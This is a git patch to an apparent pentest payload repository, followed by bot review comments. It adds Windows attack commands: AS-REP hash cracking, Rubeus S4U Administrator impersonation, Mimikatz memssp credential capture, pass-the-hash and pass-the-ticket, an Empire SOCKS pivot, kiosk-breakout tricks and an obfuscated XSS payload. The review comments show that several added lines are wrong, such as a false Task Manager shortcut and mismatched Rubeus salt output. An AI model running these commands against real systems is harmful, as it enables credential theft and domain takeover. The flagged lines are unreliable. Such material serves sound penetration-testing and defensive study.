From f7e8f515a5697e7c8ed64e703781a023f1cd410e Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 17 Dec 2020 08:56:58 +0100 Subject: [PATCH] Application Escape and Breakout --- .../Active Directory Attack.md | 8 +- Methodology and Resources/Escape Breakout.md | 111 ++++++++++++++++++ .../Network Pivoting Techniques.md | 16 ++- .../Windows - Mimikatz.md | 6 +- .../Windows - Using credentials.md | 30 ++++- XSS Injection/README.md | 10 ++ 6 files changed, 171 insertions(+), 10 deletions(-) create mode 100644 Methodology and Resources/Escape Breakout.md diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index e9afbd3..0e4857a 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1126,7 +1126,7 @@ Mitigations: If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting Prerequisite: -- Accounts have to have **DONT_REQ_PREAUTH** +- Accounts have to have **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`) ```powershell C:\>git clone https://github.com/GhostPack/Rubeus#asreproast @@ -1178,6 +1178,7 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r # crack AS_REP messages root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt +root@windows:hashcat$ hashcat64.exe -m 18200 '' -a 0 c:\wordlists\rockyou.txt ``` Mitigations: 
@@ -1806,9 +1807,9 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012. 5. Use Rubeus to get hash from password ```powershell - Rubeus.exe hash /password:'Weakest123*' /user:swktest /domain:factory.lan + Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan [*] Input password : Weakest123* - [*] Input username : swktest + [*] Input username : swktest$ [*] Input domain : factory.lan [*] Salt : FACTORY.LANswktest [*] rc4_hmac : F8E064CA98539B735600714A1F1907DD @@ -1821,6 +1822,7 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012. ```powershell .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap + .\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan' [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5) diff --git a/Methodology and Resources/Escape Breakout.md b/Methodology and Resources/Escape Breakout.md new file mode 100644 index 0000000..016f612 --- /dev/null +++ b/Methodology and Resources/Escape Breakout.md 
@@ -0,0 +1,111 @@ +# Application Escape and Breakout + +## Summary + +* [Gaining a command shell](#gaining-a-command-shell) +* [Sticky Keys](#explorer---sticky-keys) +* [Dialog Boxes](#dialog-boxes) + * [Creating new files](#creating-new-files) + * [Open a new Windows Explorer instance](#open-a-new-windows-explorer-instance) + * [Exploring Context Menus](#exploring-context-menus) + * [Save as](#save-as) + * [Input Boxes](#input-boxes) + * [Bypass file restrictions](#bypass-file-restrictions) +* [Internet Explorer](#internet-explorer) +* [Shell URI Handlers](#shell-uri-handlers) +* [References](#references) + +## Gaining a command shell + +* **Shortcut** + * [Window] + [R] -> cmd + * [CTRL] + [ALT] + [SHIFT] -> Task Manager +* **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it +* **Drag-and-drop**: dragging and dropping any file onto the cmd.exe +* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe` +* **Task Manager**: `File` > `New Task (Run...)` +* **MSPAINT.exe** + * Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels + * Zoom in to make the following tasks easier + * Using the colour picker, set pixels values to (from left to right): + * 1st: R: 10, G: 0, B: 0 + * 2nd: R: 13, G: 10, B: 13 + * 3rd: R: 100, G: 109, B: 99 + * 4th: R: 120, G: 101, B: 46 + * 5th: R: 0, G: 0, B: 101 + * 6th: R: 0, G: 0, B: 0 + * Save it as 24-bit Bitmap (*.bmp;*.dib) + * Change its extension from bmp to bat and run + + +## Sticky Keys + +* Spawn the sticky keys dialog + * Via Shell URI : `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` + * Hit 5 times [SHIFT] +* Visit "Ease of Access Center" +* You land on "Setup Sticky Keys", move up a level on "Ease of Access Center" +* Start the OSK (On-Screen-Keyboard) +* You can now use the keyboard shortcut (CTRL+N) + +## Dialog Boxes + +### Creating new files + +* Batch files – Right click > New > Text File > rename to .BAT 
(or .CMD) > edit > open +* Shortcuts – Right click > New > Shortcut > `%WINDIR%\system32` + +## Open a new Windows Explorer instance + +* Right click any folder > select `Open in new window` + +## Exploring Context Menus + +* Right click any file/folder and explore context menus +* Clicking `Properties`, especially on shortcuts, can yield further access via `Open File Location` + +### Save as + +* "Save as" / "Open as" option +* "Print" feature – selecting "print to file" option (XPS/PDF/etc) +* `\\127.0.0.1\c$\Windows\System32\` and execute `cmd.exe` + +### Input Boxes + +Many input boxes accept file paths; try all inputs with UNC paths such as `//attacker–pc/` or `//127.0.0.1/c$` or `C:\` + + +### Bypass file restrictions + +Enter *.* or *.exe or similar in `File name` box + +## Internet Explorer + +### Download and Run/Open + +* Text files -> opened by Notepad + +### Menus + +* The address bar +* Search menus +* Help menus +* Print menus +* All other menus that provide dialog boxes + +## Shell URI Handlers + +* shell:DocumentsLibrary +* shell:Librariesshell:UserProfiles +* shell:Personal +* shell:SearchHomeFolder +* shell:System shell:NetworkPlacesFolder +* shell:SendTo +* shell:Common Administrative Tools +* shell:MyComputerFolder +* shell:InternetFolder + +## References + +* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/) +* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/) \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index eea9f00..09285a3 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md 
+++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -138,7 +138,12 @@ or # Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0 run autoroute -s 192.168.15.0/24 -use auxiliary/server/socks4a +use auxiliary/server/socks_proxy +set SRVPORT 9090 +set VERSION 4a +# or +use auxiliary/server/socks4a # (deprecated) + # Meterpreter list all active routes run autoroute -p @@ -152,6 +157,15 @@ route delete 192.168.14.0 255.255.255.0 3 route flush ``` +## Empire + +```powershell +(Empire) > socksproxyserver +(Empire) > use module management/invoke_socksproxy +(Empire) > set remoteHost 10.10.10.10 +(Empire) > run +``` + ## sshuttle Transparent proxy server that works as a poor man's VPN. Forwards over ssh. diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 5f10e0b..e76595c 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -79,13 +79,13 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo mimikatz # sekurlsa::logonpasswords ``` -- LSA is running as virtualized process (LSAISO) by Credential Guard +- LSA is running as virtualized process (LSAISO) by **Credential Guard** ```powershell # Check if a process called lsaiso.exe exists on the running processes tasklist |findstr lsaiso - # If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data. - #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides + # Lets inject our own malicious Security Support Provider into memory + # require mimilib.dll in the same folder mimikatz # misc::memssp # Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log 
diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 5808c16..9e84dda 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -7,8 +7,8 @@ * [TIP 2 - Retail Credential](#tip-2-retail-credential) * [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount) * [Metasploit](#metasploit) - * [Metasploit - SMB](#metasploit-smb) - * [Metasploit - Psexec](#metasploit-psexec) + * [Metasploit - SMB](#metasploit---smb) + * [Metasploit - Psexec](#metasploit---psexec) * [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) * [WinRM](#winrm) * [Powershell Remoting](#powershell-remoting) @@ -20,6 +20,8 @@ * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [Netuse](#netuse) * [Runas](#runas) +* [Pass the Ticket](#pass-the-ticket) +* [SSH](#ssh) ## TIPS @@ -87,6 +89,7 @@ use exploit/windows/smb/psexec set RHOST 10.2.0.3 set SMBUser username set SMBPass password +set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c set PAYLOAD windows/meterpreter/bind_tcp run shell @@ -123,6 +126,7 @@ Require: root@payload$ git clone https://github.com/Hackplayers/evil-winrm root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' +root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79 ``` or using a custom ruby code to interact with the WinRM service. 
@@ -190,7 +194,7 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca ## Psexec.py / Smbexec.py / Wmiexec.py -from Impacket +From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali) ```powershell root@payload$ git clone https://github.com/CoreSecurity/impacket.git @@ -204,6 +208,8 @@ root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10 # A semi-interactive shell, used through Windows Management Instrumentation. root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10 +root@payload$ wmiexec.py domain.local/user@10.0.0.20 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79 + # A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10 @@ -289,6 +295,24 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe" PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe ``` +## Pass the Ticket + +```powershell +python3 getTGT.py -hashes aad3b435b51404eeaad3b435b51404ee:B65039D1C0359FA797F88FF06296118F domain.local/user +[*] Saving ticket in user.ccache +cp user.ccache /tmp/krb5cc_0 +export KRB5CCNAME=/tmp/krb5cc_0 +klist +``` + +## SSH + +:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash! + +```ps1 +cp user.ccache /tmp/krb5cc_1045 +ssh -o GSSAPIAuthentication=yes user@domain.local -vv +``` ## References diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 022ad40..51b9e31 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md 
@@ -49,6 +49,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Bypass ";" using another character](#bypass-using------using-another-character) - [Bypass using HTML encoding](#bypass-using-html-encoding) - [Bypass using Katana](#bypass-using-katana) + - [Bypass using Cuneiform](#bypass-using-cuneiform) - [Bypass using Lontara](#bypass-using-lontara) - [Bypass using ECMAScript6](#bypass-using-ecmascript6) - [Bypass using Octal encoding](#bypass-using-octal-encoding) @@ -834,6 +835,15 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library. javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() ``` +### Bypass using Cuneiform + +```javascript +𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], +𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] ++(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] ++𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() +``` + ### Bypass using Lontara ```javascript
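Review bot: in `Active Directory Attack.md` @@ -1178, the added `hashcat64.exe -m 18200 '' -a 0 c:\wordlists\rockyou.txt` passes an empty `''` where the hash file belongs, and cmd.exe does not strip single quotes, so the literal `''` is handed to hashcat as the hash argument and the command fails; mirror the Linux line directly above and pass the file, e.g. `hashcat64.exe -m 18200 hashes.asreproast -a 0 c:\wordlists\rockyou.txt`.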
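Review bot: in `Active Directory Attack.md` @@ -1806, the `Rubeus.exe hash` sample changes the input username to `swktest$` but leaves `[*] Salt : FACTORY.LANswktest` untouched; the AES keys Rubeus derives depend on that salt (only the rc4_hmac is salt-independent), so the pasted output no longer matches the command above it. Regenerate the output with the `$` account rather than hand-editing the username lines, so readers can trust the key material shown.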
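Review bot: in `Active Directory Attack.md` @@ -1821, the new `.\Rubeus.exe s4u /user:swktest$ /aes256:0129D2...` line uses a key that appears nowhere in the step 5 `Rubeus.exe hash` output, which only prints `rc4_hmac`; add the `aes256_cts_hmac_sha1` line of that output to step 5 so the key's origin is visible, and add a one-line comment stating that the two `s4u` invocations are alternatives (RC4 key versus AES256 key), not two steps to run in sequence.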
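Review bot: in the new `Escape Breakout.md`, `[CTRL] + [ALT] + [SHIFT] -> Task Manager` is not a Windows shortcut; Task Manager is `[CTRL] + [SHIFT] + [ESC]`, and `[CTRL] + [ALT] + [DEL]` opens the security screen from which Task Manager can be chosen. Structural points in the same file: the Summary links `#explorer---sticky-keys` while the heading is `## Sticky Keys` (anchor `#sticky-keys`); `## Open a new Windows Explorer instance` and `## Exploring Context Menus` are listed as sub-items of Dialog Boxes in the Summary but are `##` in the body, so they should be `###` like `Creating new files` and `Save as`; under Shell URI Handlers two entries are fused per line (`shell:Librariesshell:UserProfiles` and `shell:System shell:NetworkPlacesFolder`) and need splitting into four bullets; `//attacker–pc/` contains an en dash instead of a hyphen and would not work as typed; and the file is missing its trailing newline.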
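Review bot: in `Network Pivoting Techniques.md` @@ -152, the Empire block sets `remoteHost 10.10.10.10` without saying what that host is; add a comment that `socksproxyserver` is started on the Empire server and that `remoteHost` must be that server's address (the host the agent connects back to for the SOCKS tunnel), and name the Empire fork and version the block targets, since `socksproxyserver` is not present in every Empire release.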
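Review bot: in `Windows - Mimikatz.md` @@ -79, the replacement comment drops the rationale carried by the removed line (with Credential Guard an LSASS dump only yields encrypted data, which is why `sekurlsa::logonpasswords` is not attempted here and `misc::memssp` is shown instead); keep that sentence, otherwise the reader cannot tell why the Credential Guard case branches to a different technique. Also `Lets` should be `Let's` and `require mimilib.dll` should be `requires mimilib.dll`.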
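Review bot: in `Windows - Using credentials.md` @@ -87, `set SMBPass e52cac...:8846f7...` is placed directly after `set SMBPass password`, so read top to bottom the second line silently overrides the first; mark it as the alternative pass-the-hash form with a comment such as `# or pass the hash (LM:NT)`, as the surrounding blocks do for alternatives.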
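Review bot: in `Windows - Using credentials.md` @@ -190, the new link points at `https://github.com/SecureAuthCorp/impacket` while the `git clone` line two lines below still uses `https://github.com/CoreSecurity/impacket.git`; align both on one URL. `impacket-xxx` should also state the real naming pattern (the Kali package installs the scripts as `impacket-<scriptname>`, e.g. `impacket-psexec`) rather than a placeholder.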
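Review bot: in `Windows - Using credentials.md` @@ -289, the SSH block copies the ticket to `/tmp/krb5cc_1045` but never sets `KRB5CCNAME`, so it only works when the caller's uid happens to be 1045 (the default cache path is `/tmp/krb5cc_<uid>`); either export `KRB5CCNAME` as the Pass the Ticket block above does or say that 1045 stands for the current uid. The sentence above it has an unclosed parenthesis (`(Which you can get by passing the hash!`), and the fence is tagged `ps1` for what are Linux shell commands while the rest of the file uses `powershell`.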
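Review bot: in `XSS Injection/README.md` @@ -834, the Cuneiform payload is added without the attribution the neighbouring Katakana entry gives (`Using the [Katakana](...) library.`); add a one-line credit and link to the payload's source above the fence so the section matches the pattern of the other encoding entries.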